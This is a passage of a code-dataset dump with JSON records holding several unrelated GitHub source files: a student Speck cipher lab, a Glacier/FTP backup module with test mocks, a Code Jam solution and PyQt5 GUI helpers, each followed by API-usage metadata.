"name"}, {"api_name": "serializears.StudentSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 18, "usage_type": "call"}, {"api_name": "serializears.StudentSerializer", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 46, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 31, "usage_type": "call"}, {"api_name": "api.models.Student.objects.get", "line_number": 51, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 51, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 52, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 48, "usage_type": "call"}, {"api_name": "api.models.Student.objects.get", "line_number": 71, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 71, "usage_type": "name"}, {"api_name": "api.models.Student.objects.all", "line_number": 74, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 74, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 75, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 84, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "40919159928", "text": "import os # необходим для доступа к файловой системе\nimport secrets # необходим для генерации рандомных чисел\nfrom sys import argv\nimport time\nimport os.path\n\n\nclass SpeckCipher:\n BLOCK_SIZE = 64\n KEY_SIZE = 128\n ROUNDS = 27\n WORD_SIZE_N = 32\n KEY_WORDS_M = 4\n\n def encryptFile(self, fileName, key):\n cipherText = [0, 0]\n plainText = [0, 0]\n # получаем round ключ из ключа\n roundKey = self.keySchedule(self.bytesToWord32(key))\n # создаём и сохраняем IV (вектор инициализации)\n intVect = [0, 0]\n intVect[0] = self.IV()\n intVect[1] = self.IV()\n dataBytes = self.word32ToBytes(intVect)\n # открываем файл для зашифрованного текста\n fileOutput = open(fileName + '.enc', \"wb\")\n # записывам в него IV\n fileOutput.write(bytearray(dataBytes))\n # oткрываем файл исходного текста\n fileSize = os.path.getsize(fileName)\n fileInput = open(fileName, \"rb\")\n blockSize = 8\n padding = -1\n # читаем блоки по 8 бит\n for i in range(0, fileSize, blockSize):\n block = fileInput.read(blockSize)\n endIndex = i + blockSize\n endIndex = fileSize if endIndex > fileSize else endIndex\n # проверяем необходимы ли заполняющие биты\n if len(block) < blockSize:\n padding = blockSize - (endIndex % blockSize)\n if padding != blockSize:\n blck = self.padding(block, blockSize, pad=padding)\n block = [ord(x) for x in blck]\n # зашифровываем блок и записываем его в файл\n block_list = list(block)\n plainText = self.bytesToWord32(block_list)\n cipherText = self.encrypt(plainText, roundKey, intVect)\n encBlock = self.word32ToBytes(cipherText)\n fileOutput.write(bytearray(encBlock))\n # если длина дополнения = 8, то добавляем ещё один блок\n if padding == blockSize:\n block = [8] * blockSize\n plainText = self.bytesToWord32(block)\n cipherText = self.encrypt(plainText, roundKey, intVect)\n encBlock = self.word32ToBytes(cipherText)\n fileOutput.write(bytearray(encBlock))\n # закрываем файлы\n fileOutput.flush()\n fileOutput.close()\n fileInput.close()\n\n def decryptFile(self, fileName, key):\n cipherText = [0, 0]\n plainText = [0, 0]\n # получаем round ключ из ключа\n roundKey = self.keySchedule(self.bytesToWord32(key))\n # открываем файл для дешифрованного текста\n fileOutput = open(fileName + '.dec', \"wb\")\n # открываем файл с зашифрованным текстом\n fileSize = os.path.getsize(fileName + '.enc')\n fileInput = open(fileName + '.enc', \"rb\")\n blockSize = 8\n # создаём и сохраняем IV (вектор инициализации)\n intVect = [0, 0]\n for i in range(0, fileSize, blockSize):\n endIndex = i + blockSize\n endIndex = fileSize if endIndex > fileSize else endIndex\n block = list(fileInput.read(blockSize))\n if i == 0:\n # первый блок содержит вектор инициализации\n intVect = self.bytesToWord32(block)\n else:\n # остальные блоки содержат зашифрованный текст\n cipherText = self.bytesToWord32(block)\n plainText = self.decrypt(cipherText, roundKey, intVect)\n decBlock = self.word32ToBytes(plainText)\n # ...за исключением последнего, который дополнен значениями до длины блока\n if endIndex == fileSize:\n # получаем длину отступа\n a = decBlock[7]\n # удаляем дополнительные биты\n while a > 0:\n decBlock.pop()\n a -= 1\n # записываем в файл\n fileOutput.write(bytearray(decBlock))\n #закрываем файлы\n fileOutput.flush()\n fileOutput.close()\n fileInput.close()\n\n # 32-разрядная функция поворота влево\n def Rol(self, x, r):\n tmp = (x >> (self.WORD_SIZE_N - r)) & 0x00000000ffffffff\n return ((x << r) | tmp) & 0x00000000ffffffff\n\n # 32-разрядная функция поворота вправо\n def Ror(self, x, r):\n tmp = (x << (self.WORD_SIZE_N - r)) & 0x00000000ffffffff\n return ((x >> r) | tmp) & 0x00000000ffffffff\n\n # вектор инициализации: возвращаем 32 битное число\n def IV(self):\n return secrets.randbits(32)\n\n # преобразует блоки по 4 байта в 32-битные слова, используя little-endian порядок:\n # первый байт в самые правые 8 бит и так далее до самых левых 8 бит\n def bytesToWord32(self, inBytes):\n lenght = len(inBytes)\n outWords = [0] * (lenght // 4)\n j = 0\n for i in range(0, lenght, 4):\n outWords[j] = inBytes[i] | (inBytes[i + 1] << 8) | (inBytes[i + 2] << 16) | (inBytes[i + 3] << 24)\n j += 1\n return outWords\n\n # преобразует 32-битное слово в 4 байта, используя порядок little-endian:\n def word32ToBytes(self, inWords):\n lenght = len(inWords)\n outBytes = [0] * (lenght * 4)\n j = 0\n for i in range(0, lenght):\n outBytes[j] = inWords[i] & 0xff\n outBytes[j + 1] = (inWords[i] >> 8) & 0xff\n outBytes[j + 2] = (inWords[i] >> 16) & 0xff\n outBytes[j + 3] = (inWords[i] >> 24) & 0xff\n j += 4\n return outBytes\n\n # планировщик ключей: получает ключ и подготавливает буфер round ключей\n def keySchedule(self, key):\n subKey = [0] * self.ROUNDS\n key = key\n A, B, C, D = key[0], key[1], key[2], key[3]\n\n for i in range(0, self.ROUNDS, 3):\n subKey[i] = A\n B = self.Ror(B, 8)\n B = (B + A) & 0x00000000ffffffff\n B ^= i\n A = self.Rol(A, 3)\n A ^= B\n\n subKey[i + 1] = A\n C = self.Ror(C, 8)\n C = (C + A) & 0x00000000ffffffff\n C ^= (i + 1)\n A = self.Rol(A, 3)\n A ^= C\n\n subKey[i + 2] = A\n D = self.Ror(D, 8)\n D = (D + A) & 0x00000000ffffffff\n D ^= (i + 2)\n A = self.Rol(A, 3)\n A ^= D\n return subKey\n\n # зашифрует блок, используя round ключ и IV, и вернет зашифрованный блок\n def encrypt(self, plainText, roundKey, intVect):\n cipherText = plainText # [0, 0]\n plainText = plainText\n for i in range(0, self.ROUNDS):\n intVect[1] = self.Ror(intVect[1], 8)\n intVect[1] = (intVect[1] + intVect[0]) & 0x00000000ffffffff\n intVect[1] ^= roundKey[i]\n intVect[0] = self.Rol(intVect[0], 3)\n intVect[0] ^= intVect[1]\n cipherText[0] = plainText[0] ^ intVect[0]\n cipherText[1] = plainText[1] ^ intVect[1]\n return cipherText\n\n # расшифрует блок, используя round ключ и IV, и вернет расшифрованный блок\n def decrypt(self, cipherText, roundKey, intVect):\n plainText = cipherText # [0, 0]\n cipherText = cipherText\n for i in range(0, self.ROUNDS):\n intVect[1] = self.Ror(intVect[1], 8)\n intVect[1] = (intVect[1] + intVect[0]) & 0x00000000ffffffff\n intVect[1] ^= roundKey[i]\n intVect[0] = self.Rol(intVect[0], 3)\n intVect[0] ^= intVect[1]\n plainText[0] = cipherText[0] ^ intVect[0]\n plainText[1] = cipherText[1] ^ intVect[1]\n return plainText\n\n # заполнение строки дополнительными значениями до заданной длины\n def padding(self, txt, lng, pad=0, truncate=False):\n text = str(txt)\n # если это массив байтов, удаляем ненужные символы\n if text.find(\"b'\") != -1:\n text = text[2:-1]\n pad = pad\n # требуется ли усечение?\n if truncate:\n if len(text) % lng == 0:\n # длина равна запрашиваемой: возвращает заданную строку\n return text\n else:\n # Возвращает выровненную строку\n return text.ljust(len(text) + lng - (len(text) % lng))\n # проверяем, заполнена ли строка\n if len(text) == lng:\n # возвращаем строку\n return text\n elif len(text) > lng:\n return text[:lng]\n else:\n # Возвращает выровненную строку\n return text.ljust(len(text) + lng - (len(text) % lng), chr(pad))\n\n\nFILENAME = \"sample.txt\"\n\n# создание экземпляра класса\nspeck = SpeckCipher()\n\n\n\ndef main(arguments):\n # запрашиваем ключ\n tmpKey = input('Enter key (16 chars, no spaces): ')\n tmpKey.replace(' ', '')\n if tmpKey == '':\n return\n # дополняем ключ до 16 байт\n key = speck.padding(tmpKey, 16, truncate=True)\n keyLst = list(key)\n keyList = [ord(x) for x in keyLst]\n\n # запрашиваем файл для зашифрования\n tmpFile = input('File to be encrypted (return = sample file): ')\n if tmpFile == '':\n # если файл не задан, то берём дефолтный\n tmpFile = FILENAME\n if not os.path.isfile(tmpFile):\n # если файл не создан, создаём\n f = open(tmpFile, \"w\")\n f.write(\"Sample text\")\n f.flush()\n f.close()\n print('Sample file not found - created')\n # проверяем если заданный файл существует\n if not os.path.exists(tmpFile):\n print('{} doesn\\'t exist.'.format(tmpFile))\n return\n # проверяем за заданный файл валидный\n if not os.path.isfile(tmpFile):\n print('{} isn\\'t a valide file.'.format(tmpFile))\n return\n\n print(f'Encrypting {tmpFile}...')\n time1 = time.time()\n speck.encryptFile(tmpFile, keyList)\n time2 = time.time()\n print('File encrypted. Time elapsed: {}'.format(time2 - time1))\n\n print('Now decrypting...')\n time1 = time.time()\n speck.decryptFile(tmpFile, keyList)\n time2 = time.time()\n print('File decrypted. Time elapsed: {}'.format(time2 - time1))\n\n\nif __name__ == \"__main__\":\n main(argv)\n", "repo_name": "Elizaveta-Kazakova/IS", "sub_path": "lab2/SpeckCipher.py", "file_name": "SpeckCipher.py", "file_ext": "py", "file_size_in_byte": 11625, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.getsize", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "secrets.randbits", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path", "line_number": 247, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 259, "usage_type": "call"}, {"api_name": "os.path", "line_number": 259, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 264, "usage_type": "call"}, {"api_name": "time.time", "line_number": 266, "usage_type": "call"}, {"api_name": "time.time", "line_number": 270, "usage_type": "call"}, {"api_name": "time.time", "line_number": 272, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 277, "usage_type": "argument"}]} +{"seq_id": "25215612301", "text": "import uuid\nimport multiprocessing\nimport logging as logging_\nimport random\nimport os\nimport time\nfrom ftplib import FTP\n\nlogger = logging_.getLogger(__name__)\n\n\nclass GlacierData():\n\n def __init__(self):\n self.archive_id = None\n\n\nclass Glacier():\n \"\"\"Service to interact with Amazon Glacier\"\"\"\n\n def __init__(self, ctx):\n self.ctx = ctx\n self.layer2 = None\n\n def upload_file(self, directory, filename):\n \"\"\"Uploads a file to glacier. Returns an instance of GlacierData\"\"\"\n logger.debug(\"Uploading file '%s/%s'\", directory, filename)\n if self.ctx.dry_run:\n return\n from boto.glacier.layer2 import Layer2\n self.layer2 = Layer2(\n self.ctx.config.get(\"identity\", \"aws_access_key_id\"),\n self.ctx.config.get(\"identity\", \"aws_secret_access_key\")\n )\n\n vault = self.layer2.get_vault(self.ctx.config.get(\"defaults\", \"vault_name\"))\n archive_id = vault.create_archive_from_file(os.path.join(directory, filename),\n description=os.path.join(directory, filename))\n\n glacier_data = GlacierData()\n glacier_data.archive_id = archive_id\n return glacier_data\n\n def close(self):\n if self.layer2:\n try:\n self.layer2.close()\n except:\n logger.exception(\"Exception detected when trying to close(), \"\n \"will log and ignore it...\")\n finally:\n self.layer2 = None\n\n\n#===============================================================================\n# Mocks and other implementations to easy tests\n#===============================================================================\n\nclass GlacierMock():\n\n def __init__(self, ctx):\n self.ctx = ctx\n\n def upload_file(self, directory, filename):\n logger.debug(\"Uploading file '%s/%s'\", directory, filename)\n glacier_data = GlacierData()\n glacier_data.archive_id = str(uuid.uuid4())\n return glacier_data\n\n def close(self):\n pass\n\n\nclass GlacierErrorOnUploadMock(GlacierMock):\n\n def upload_file(self, directory, filename):\n raise(Exception(\"This implementation of upload_file() ALWAYS raises an exception\"))\n\n\nclass GlacierFtpBased():\n\n def __init__(self, ctx):\n self.ctx = ctx\n self.ftp_user = 'random_{0}'.format(random.randint(1000000, 9999999))\n self.ftp_password = str(uuid.uuid4())\n self.ftp_port = 18263\n self.upload_file_ftp_callback = None\n\n def _launch(self):\n logger.info(\"Launching FTP server in child process\")\n from pyftpdlib.authorizers import DummyAuthorizer\n from pyftpdlib.handlers import FTPHandler\n from pyftpdlib.servers import FTPServer\n authorizer = DummyAuthorizer()\n authorizer.add_user(self.ftp_user, self.ftp_password, \"/tmp\", perm=\"w\")\n handler = FTPHandler\n handler.authorizer = authorizer\n server = FTPServer((\"127.0.0.1\", self.ftp_port), handler)\n server.serve_forever()\n\n def kill_ftp(self):\n logger.info(\"Terminanting child...\")\n self.child.terminate()\n logger.info(\"Joining child...\")\n self.child.join()\n logger.info(\"Done!\")\n\n def launch(self):\n self.child = multiprocessing.Process(target=self._launch)\n self.child.start()\n\n def wait_for_ftpserver(self):\n ftp = FTP()\n for try_num in range(1, 11):\n try:\n ftp.connect('127.0.0.1', self.ftp_port)\n logger.info(\"Connect OK after %s tries\", try_num)\n return\n except:\n time.sleep(0.1)\n ftp.connect('127.0.0.1', self.ftp_port)\n\n def upload_file(self, directory, filename):\n logger.info(\"Connecting to FTP...\")\n ftp = FTP()\n ftp.connect('127.0.0.1', self.ftp_port)\n logger.info(\"Logging in to FTP...\")\n ftp.login(self.ftp_user, self.ftp_password)\n generated_uuid = str(uuid.uuid4())\n remote_filename = \"{0}-{1}\".format(filename, generated_uuid)\n with open(os.path.join(directory, filename)) as fp:\n logger.info(\"Sending file to FTP server...\")\n ftp.storbinary(\"STOR {0}\".format(remote_filename), fp, 128,\n self.upload_file_ftp_callback)\n logger.info(\"File sent OK to FTP\")\n\n glacier_data = GlacierData()\n glacier_data.archive_id = generated_uuid\n return glacier_data\n\n def close(self):\n pass\n", "repo_name": "hgdeoro/frockup", "sub_path": "frockup/glacier.py", "file_name": "glacier.py", "file_ext": "py", "file_size_in_byte": 4523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "boto.glacier.layer2.Layer2", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 67, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 84, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 85, "usage_type": "call"}, {"api_name": "pyftpdlib.authorizers.DummyAuthorizer", "line_number": 94, "usage_type": "call"}, {"api_name": "pyftpdlib.handlers.FTPHandler", "line_number": 96, "usage_type": "name"}, {"api_name": "pyftpdlib.servers.FTPServer", "line_number": 98, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 109, "usage_type": "call"}, {"api_name": "ftplib.FTP", "line_number": 113, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 120, "usage_type": "call"}, {"api_name": "ftplib.FTP", "line_number": 125, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}]} +{"seq_id": "23576875181", "text": "import math\nimport itertools\n\ndef solve(recipe, ingredients):\n limits = transform(recipe, ingredients)\n count = 0\n if len(recipe) == 1:\n return len(limits[0])\n if len(recipe) != 2:\n return None\n for pairing in itertools.permutations(range(len(ingredients[0]))):\n potential_count = 0\n for i, pair in enumerate(pairing):\n if i >= len(limits[0]) or pair >= len(limits[1]):\n continue\n (min_1, max_1) = limits[0][i]\n (min_2, max_2) = limits[1][pair]\n if min_1 > max_2 or min_2 > max_1:\n continue\n potential_count += 1\n if potential_count > count:\n count = potential_count\n return count\n\ndef faster_solve(recipe, ingredients):\n limits = transform(recipe, ingredients)\n pointers = [0 for i in range(len(limits))]\n\n count = 0\n while True:\n if pointers[0] >= len(limits[0]):\n return count\n (lower, upper) = limits[0][pointers[0]]\n success = True\n max_limiter = 0\n for i in range(1, len(limits)):\n if pointers[i] >= len(limits[i]):\n return count\n (new_lower, new_upper) = limits[i][pointers[i]]\n while new_upper < lower and pointers[i] < len(limits[i]) - 1:\n pointers[i] += 1\n new_lower, new_upper = limits[i][pointers[i]]\n if pointers[i] >= len(limits[i]) or new_upper < lower:\n return count\n if new_lower > upper:\n pointers[max_limiter] += 1\n success = False\n break\n lower = max(lower, new_lower)\n if new_upper < upper:\n upper = new_upper\n max_limiter = i\n if success:\n count += 1\n for i in range(len(limits)):\n pointers[i] += 1\n\n return count\n\n\ndef transform(recipe, ingredients):\n limits = []\n for i, ingredient in enumerate(ingredients):\n ingredient_limits = []\n for package in ingredient:\n factor = float(package) / recipe[i]\n lower_bound = int(math.ceil(factor / 1.1))\n upper_bound = int(math.floor(factor / 0.9))\n if lower_bound > upper_bound:\n continue\n else:\n ingredient_limits.append((lower_bound, upper_bound))\n limits.append(sorted(ingredient_limits))\n return limits\n\n\n\n\ndef parse():\n N, P = [int(i) for i in raw_input().split()]\n recipe = [int(i) for i in raw_input().split()]\n ingredients = []\n for r in range(N):\n row = [int(c) for c in raw_input().split()]\n ingredients.append(row)\n return recipe, ingredients\n\nT = int(raw_input())\nfor t in range(1, T+1):\n recipe, ingredients = parse()\n print(\"Case #{0}: {1}\".format(t, faster_solve(recipe, ingredients)))", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_204/125.py", "file_name": "125.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.permutations", "line_number": 11, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 67, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "3711461774", "text": "from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\n\nfrom netaddr import IPNetwork\nimport math, socket, ipaddress\n\nimport os, platform\n#--------------------------------------------------------------------------------#\n# This class contains blueprint functions that allows quick build of gui objects #\n#--------------------------------------------------------------------------------#\n\nversion_number = 3.0\n\nclass blueprintFunctions:\n\n def getCurrentOS():\n return platform.system()\n\n def getDesktopPath(): # Returns the user' path to their Desktop\n if (blueprintFunctions.getCurrentOS() == \"Linux\"):\n desktop = os.path.join(os.path.join(os.path.expanduser('~')), 'Desktop')\n elif (blueprintFunctions.getCurrentOS() == \"Windows\"):\n desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\n return desktop\n\n def deleteOutputFile():\n tab = [str(blueprintFunctions.getDesktopPath()) + \"/solution.txt\", str(blueprintFunctions.getDesktopPath()) + \"/solution_v2.txt\", str(blueprintFunctions.getDesktopPath()) + \"/packet-tracer.yaml\", str(blueprintFunctions.getDesktopPath()) + \"/packet-tracer_v2.yaml\"]\n for i in range(len(tab)):\n if (os.path.exists(tab[i])):\n os.remove(tab[i])\n\n def mkBtn (btn, geometry, style, text, small_size = False):\n btn.setGeometry(geometry)\n if (small_size is True):\n btn.setFont(font_btn2)\n else:\n btn.setFont(font_btn)\n btn.setStyleSheet(style)\n btn.setObjectName(str(btn))\n btn.setText(text)\n\n def mkLabPic (lab, geometry, picture, scaled):\n # Scaled => True or False\n lab.setGeometry(geometry)\n lab.setText(\"\")\n lab.setPixmap(picture)\n lab.setScaledContents(scaled)\n lab.setObjectName(str(lab))\n\n def mkLabel (lab, geometry, text, small_size = False):\n lab.setGeometry(geometry)\n if (small_size is True):\n lab.setFont(font_label2)\n else:\n lab.setFont(font_label)\n lab.setObjectName(str(lab))\n lab.setText(text)\n\n def mkLineEdit (edit, geometry, maxLength, text, small_size = False):\n edit.setGeometry(geometry)\n if (small_size is True):\n edit.setFont(font_linedit2)\n else:\n edit.setFont(font_linedit)\n edit.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n edit.setAlignment(QtCore.Qt.AlignCenter)\n edit.setMaxLength(maxLength)\n edit.setText(text)\n edit.setObjectName(str(edit))\n\n def mkBtnHome (btn, geometry):\n btn.setGeometry(geometry)\n btn.setObjectName(str(btn))\n btn.setStyleSheet(home_style)\n btn.setFont(font_btn)\n btn.setText(\"Home\")\n\n def mkGroupBox (gb, geometry, text, small_size = False):\n gb.setGeometry(geometry)\n if (small_size is True):\n gb.setFont(font_gb2)\n else:\n gb.setFont(font_gb)\n gb.setTitle(text)\n gb.setObjectName(str(gb))\n\n def mkCombo (combo, geometry, style):\n combo.setGeometry(geometry)\n combo.setFont(font_linedit)\n combo.setStyleSheet(style)\n combo.setObjectName(str(combo))\n\n def mkCheck (check, geometry, checked, text, small_size = False):\n check.setGeometry(geometry)\n if (small_size is True):\n check.setFont(font_label2)\n else:\n check.setFont(font_label)\n check.setLayoutDirection(QtCore.Qt.RightToLeft)\n check.setChecked(checked)\n check.setObjectName(str(check))\n check.setText(text)\n\n def mkRadio (rad, geometry, checked, text, small_size = False):\n rad.setGeometry(geometry)\n if (small_size is True):\n rad.setFont(font_label2)\n else:\n rad.setFont(font_label)\n rad.setLayoutDirection(QtCore.Qt.RightToLeft)\n rad.setChecked(checked)\n rad.setObjectName(str(rad))\n rad.setText(text)\n\n def mkWarningMsg(title, text):\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Warning)\n msg.setWindowIcon(QtGui.QIcon(\"img/worker-warning-msg.png\"))\n msg.setText(text)\n msg.setWindowTitle(title)\n msg.exec()\n\n def build_about_popup(self):\n import webbrowser\n msgBox = QMessageBox()\n #msgBox.setStyleSheet(\"background-color: rgb(147, 147, 147);\")\n msgBox.setWindowIcon(QtGui.QIcon(\"img/about.png\"))\n msgBox.setWindowTitle(\"About\")\n data = \"Networking Toolkit\"\n data += \"Application used to facilitate the generation of exams (Packet Tracer) via an easy-to-use GUI.\"\n data += \"\"\n data += \"Version : \" + str(version_number) + \"\"\n data += \"Os : Windows 10\"\n data += \"Python : \" + str(\n platform.python_version()) + \"\"\n data += \"© Morgan Valentin. All rights reserved.\"\n msgBox.setTextFormat(1) # Sets data to html type\n msgBox.setText(data)\n msgBox.setIcon(QMessageBox.Information)\n\n github_btn = msgBox.addButton('View project on github', QMessageBox.YesRole)\n github_btn.setStyleSheet(\"background-color: rgb(85, 255, 255);\")\n github_btn.setFont(font_btn3)\n github_btn.clicked.disconnect()\n github_btn.clicked.connect(lambda: webbrowser.open('https://github.com/momo007Dev/TFE-Networking_toolkit'))\n\n get_manual_btn = msgBox.addButton('Download the user manual', QMessageBox.YesRole)\n get_manual_btn.clicked.disconnect()\n get_manual_btn.setStyleSheet(\"background-color: rgb(85, 255, 127);\")\n get_manual_btn.setFont(font_btn3)\n get_manual_btn.clicked.connect(lambda: webbrowser.open('https://github.com/momo007Dev/TFE-Networking_toolkit/raw/main/Manuels.zip'))\n\n close_btn = msgBox.addButton('Close this window', QMessageBox.RejectRole)\n close_btn.setStyleSheet(\"background-color: rgb(255, 179, 179);\")\n close_btn.setFont(font_btn3)\n\n msgBox.exec_()\n\n # ---------------------------\n # Fills combo with /32 => /0\n #----------------------------\n def fillComboCidr (combo):\n for i in reversed(range(0,33)):\n combo.addItem(\"/\" + str(i))\n\n # ---------------------------\n # Fills combo with /30 => /0\n #----------------------------\n def fillComboCidr2 (combo):\n for i in reversed(range(0,31)):\n combo.addItem(\"/\" + str(i))\n combo.setCurrentIndex(6)\n\n def mkTable (table, geometry, style, col, row, small_size = False):\n table.setGeometry(geometry)\n if (small_size is True):\n table.setFont(font_table2)\n else:\n table.setFont(font_table)\n table.setStyleSheet(style)\n table.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)\n table.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n table.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)\n table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)\n table.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)\n table.setObjectName(str(table))\n table.setColumnCount(col)\n table.setRowCount(row)\n table.verticalHeader().setVisible(False)\n\n def addDataTable (table, position, text):\n item = QtWidgets.QTableWidgetItem()\n item.setText(text)\n table.setHorizontalHeaderItem(position, item)\n\n def checkIp(ip_string):\n try:\n network = ipaddress.IPv4Network(ip_string)\n return True\n except ValueError:\n return False\n\n def checkInt(str):\n if (str.isdigit()):\n return True\n else:\n return False\n\n\n #--------EXAM utils functions----------#\n\n def fillComboIpRule (combo):\n combo.addItem(\"1st IP Available\")\n combo.addItem(\"2nd IP Available\")\n combo.addItem(\"Last IP -1\")\n combo.addItem(\"Last IP Available\")\n\n def fillComboIntSwitch(combo):\n for i in reversed(range(1, 25)):\n combo.addItem(\"F0/\" + str(i))\n combo.addItem(\"G0/2\")\n combo.addItem(\"G0/1\")\n\n def fillComboIntRouter(combo):\n tab = {0: \"G\", 1: \"F\", 2: \"S\", 3: \"E\"}\n for i in tab:\n if (i == 2 or i==3): # S0/0/0\n n1 = 0\n n2 = 0\n while n2 <= 2:\n n3 = 0\n while n3 <= 1:\n combo.addItem(str(tab.get(i)) + str(n1) + \"/\" + str(n2) + \"/\" + str(n3))\n n3 += 1\n n2 += 1\n else: # F0/0 - G0/0\n n1 = 0\n while n1 <= 2:\n n2 = 0\n while n2 <= 2:\n combo.addItem(str(tab.get(i)) + str(n1) + \"/\" + str(n2))\n n2 += 1\n n1 += 1\n\n def format_output_interface(text):\n if (text[0] == \"G\"):\n string = \"GigabitEthernet\" + str(text[1:])\n return string\n elif (text[0] == \"F\"):\n string = \"FastEthernet\" + str(text[1:])\n return string\n elif (text[0] == \"S\"):\n string = \"Serial\" + str(text[1:])\n return string\n elif (text[0] == \"E\"):\n string = \"Ethernet\" + str(text[1:])\n return string\n else:\n return text\n\n def fillComboPortTcp(combo):\n combo.addItem(\"20 (FTP)\")\n combo.addItem(\"21 (FTP)\")\n combo.addItem(\"22 (SSH)\")\n combo.addItem(\"23 (Telnet)\")\n combo.addItem(\"25 (SMTP)\")\n combo.addItem(\"80 (HTTP)\")\n combo.addItem(\"110 (POP3)\")\n combo.addItem(\"115 (SFTP)\")\n combo.addItem(\"143 (IMAP)\")\n combo.addItem(\"443 (HTTPS)\")\n\n def fillComboPortUdp(combo):\n combo.addItem(\"53 (DNS)\")\n combo.addItem(\"69 (TFTP)\")\n combo.addItem(\"123 (NTP)\")\n\n #--------END----------------------------#\n\n#----------------\n# FONT USED\n#----------------\nfont_btn = QtGui.QFont()\nfont_btn.setPointSize(10)\nfont_btn.setBold(True)\nfont_btn.setWeight(75)\n\nfont_btn2 = QtGui.QFont()\nfont_btn2.setPointSize(9)\nfont_btn2.setBold(True)\nfont_btn2.setWeight(75)\n\nfont_btn3 = QtGui.QFont()\nfont_btn3.setPointSize(8)\nfont_btn3.setBold(True)\n\nfont_label = QtGui.QFont()\nfont_label.setPointSize(12)\nfont_label.setBold(True)\nfont_label.setUnderline(True)\nfont_label.setWeight(75)\n\nfont_label2 = QtGui.QFont()\nfont_label2.setPointSize(10)\nfont_label2.setBold(True)\nfont_label2.setUnderline(True)\nfont_label2.setWeight(75)\n\nfont_linedit = QtGui.QFont()\nfont_linedit.setFamily(\"Verdana\")\nfont_linedit.setPointSize(10)\nfont_linedit.setBold(True)\nfont_linedit.setWeight(75)\n\nfont_linedit2 = QtGui.QFont()\nfont_linedit2.setFamily(\"Verdana\")\nfont_linedit2.setPointSize(8)\nfont_linedit2.setBold(True)\nfont_linedit2.setWeight(75)\n\nfont_gb = QtGui.QFont()\nfont_gb.setPointSize(12)\nfont_gb.setBold(True)\nfont_btn.setUnderline(False)\nfont_gb.setWeight(75)\n\nfont_gb2 = QtGui.QFont()\nfont_gb2.setPointSize(10)\nfont_gb2.setBold(False)\nfont_gb2.setUnderline(False)\n\nfont_table = QtGui.QFont()\nfont_table.setPointSize(9)\n\nfont_table2 = QtGui.QFont()\nfont_table2.setPointSize(7)\n\n#---------------------\n# STYLESHEETS USED\n#---------------------\nhome_style =\"background-color: rgb(125, 255, 255);\"", "repo_name": 